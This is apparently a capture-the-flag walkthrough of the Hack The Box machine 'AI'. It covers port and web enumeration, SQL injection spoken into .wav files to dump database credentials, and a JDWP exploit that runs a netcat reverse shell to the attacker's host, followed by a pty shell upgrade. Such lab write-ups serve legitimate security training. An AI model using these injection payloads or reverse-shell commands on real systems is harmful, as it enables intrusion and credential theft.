AI
The Basics
The first thing we should do is map the box IP address to the box name .htb in the /etc/hosts
file.
10.10.10.163 ai.htb
Initial Scan
Next up we will run a all port NMAP scan nmap -sC -sV -p- 10.10.10.163
. We get results back for 2 ports: 22 SSH open and 80 HTTP open.
Web Enumeration
Let’s take a look at port 80 and run a gobuster.
We quickly get some promising results. We’ll take a look at ai.php and intelligence.php. It looks like we have some upload functionality for .wav
files. The AI will process the .wav
files into a search query. Looking at the intelligence page, we can get an overview of some commands and their results after processing by the AI. The page also hints to Microsoft and a Male US voice model. After some googling I found a free Text-To-Speech service with a Male US voice model and an extended Speech-To-Text table.
Generating wav files to dump credentials from the MySQL database
The speech-to-text table contains output that strongly hints to SQL injection, like union, schema, comma, period, -- -
. So let’s try to generate a .wav
file and test this.
We generate single-quote.wav which contains “open single quote”, this should result in a single quote after processing by the AI.
Next up let’s try dumping credentials. We generate username.wav and password.wav which contain:
open single quote union select yusername from users comment database
open single quote union selectpassword from users comment database
To make sure the AI parses our commands correctly we have to play around with the speed, spacing and spelling.
We successfully extract a username and password.
User flag and enumeration
With our credentials, we can SSH into the user and grab the user flag.
ssh al***@ai.htb
.
For the next part we will do some heavy enumeration. We run the following scripts and go through the output to look for anything of interest:
Looking at the running processes output from linpeas.sh we can see -agentlib:jdwp
is flagged with a 99% PE.
Monitoring pspy64 we see some interesting output regarding /root/tomcat.sh
which seems to be killing and restarting a Tomcat instance which spawns the same process which was flagged by linpeas.
If we take a look at the network connections and listeners with netstat -auntp
we see localhost is listening on ports 8000, 8080, 8005 and 8009. From the previous output we know the Tomcat server is running on port 8000.
Exploiting JDWP to gain a root shell
The Java Debug Wire Protocol (JDWP) enables remote debugging of java applications with the Java Debugger (JDB). Googling for a JDWP exploit will find us a Github Repository with a JDWP exploitation script called jdwp-shellifier.py.
Because the default netcat binary on the box doesn’t support the -e
flag, we will upload our own /usr/bin/nc
to /tmp
, we will also upload the jdwp-shellifier.py script.
Before we run the script we will set up a listener with nc -lnvp 444
. Now we can run the exploit:
./jdwp-shellifier.py -t 127.0.0.1 -p 8000 --break-on 'java.lang.String.indexOf' --cmd '/tmp/nc 10.10.14.XXX 444 -e /bin/bash'
We successfully get a connection back and can upgrade our shell using python:
python -c "import pty;pty.spawn('/bin/bash')"
export TERM=xterm
Now we can grab the root flag.